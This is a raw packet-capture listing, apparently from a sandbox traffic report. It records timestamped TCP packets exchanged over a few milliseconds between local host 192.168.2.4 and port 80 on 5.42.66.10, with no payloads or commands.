May 6, 2024 07:53:04.774971008 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774980068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774990082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775002003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775003910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775013924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775026083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775034904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775038958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775042057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775049925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775058031 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775063038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775073051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775088072 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775110960 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775141954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775152922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775165081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775176048 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775177956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775191069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775203943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775203943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775219917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775249004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775290012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775302887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775312901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775325060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775330067 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775336981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775347948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775353909 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775377989 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775392056 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775579929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775592089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775621891 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775630951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775686026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775755882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775767088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775779009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775790930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775796890 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775801897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775814056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775825977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775829077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775839090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775842905 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775851011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775861979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775870085 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775873899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775882006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775887012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775897026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.775902033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775923967 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.775947094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776082039 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776104927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776117086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776129007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776139975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776149035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776151896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776164055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776170015 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776199102 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776206970 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776231050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776242018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776252985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776263952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776268005 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776276112 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776276112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776288986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776295900 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776319027 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776343107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776362896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776374102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776385069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776396990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776401997 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776408911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776413918 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776421070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776432037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776434898 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776443958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776454926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776460886 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776465893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776478052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776479006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776490927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776495934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776503086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776510954 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776515961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776525974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776537895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776540995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776551962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776563883 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776582956 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776608944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776606083 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776627064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776650906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776662111 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776806116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776818037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776828051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776839972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776844025 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776849985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776859045 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776860952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776873112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776876926 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776885033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776896000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776902914 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776906967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776918888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776923895 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776930094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776942015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776942968 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776952982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776959896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776964903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776978016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.776988029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.776989937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777002096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777017117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777038097 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777050972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777062893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777072906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777084112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777091026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777096987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777108908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777118921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777160883 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777184963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777199030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777208090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777220011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777223110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777231932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777244091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777250051 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777256012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777275085 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777292967 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777357101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777369022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777379990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777390957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777398109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777405977 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777409077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777422905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777426958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777432919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777443886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777450085 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777457952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777468920 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777486086 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777508020 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777518034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777530909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777542114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777553082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777558088 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777565002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777566910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777576923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777585030 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777589083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777600050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777616978 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777635098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777642012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777654886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777666092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777677059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777679920 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777688980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777699947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777704954 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777712107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777724981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777730942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777740002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777749062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777760983 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777782917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777784109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777795076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777806997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777817965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777820110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777831078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777833939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777847052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777852058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777859926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777868032 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777873039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777885914 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777911901 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777931929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777942896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777952909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777965069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777966022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.777977943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777990103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.777991056 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778002024 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778016090 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778033972 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778055906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778068066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778079033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778094053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778119087 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778244019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778255939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778265953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778278112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778283119 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778290033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778301001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778306961 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778311968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778325081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778335094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778337002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778347015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778352976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778358936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778371096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778379917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778382063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778393984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778403044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778404951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778417110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778420925 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778428078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778438091 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778439999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778451920 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778451920 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778462887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778476000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778479099 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778486013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778497934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778502941 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778511047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778522015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778522015 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778536081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778541088 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778548002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778558969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778564930 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778580904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778589010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778597116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778606892 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778609037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778621912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778633118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778635025 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778644085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778656960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778657913 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778666973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778671026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778680086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778691053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778697968 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778702974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778717041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778726101 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778728008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778738022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778743982 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778749943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778760910 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778768063 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778774977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778788090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778793097 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778800011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778805017 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778812885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778824091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778831959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778836966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778846979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778855085 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778858900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778870106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778873920 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778882027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778887987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778893948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778906107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778913975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778918028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778928041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778939962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778939962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778951883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778955936 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778963089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778975010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778981924 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.778986931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.778997898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779006004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779023886 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779041052 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779062986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779074907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779086113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779098988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779103994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779128075 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779153109 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779292107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779303074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779313087 CEST	80	49741	5.42.66.10	192.168.2.4
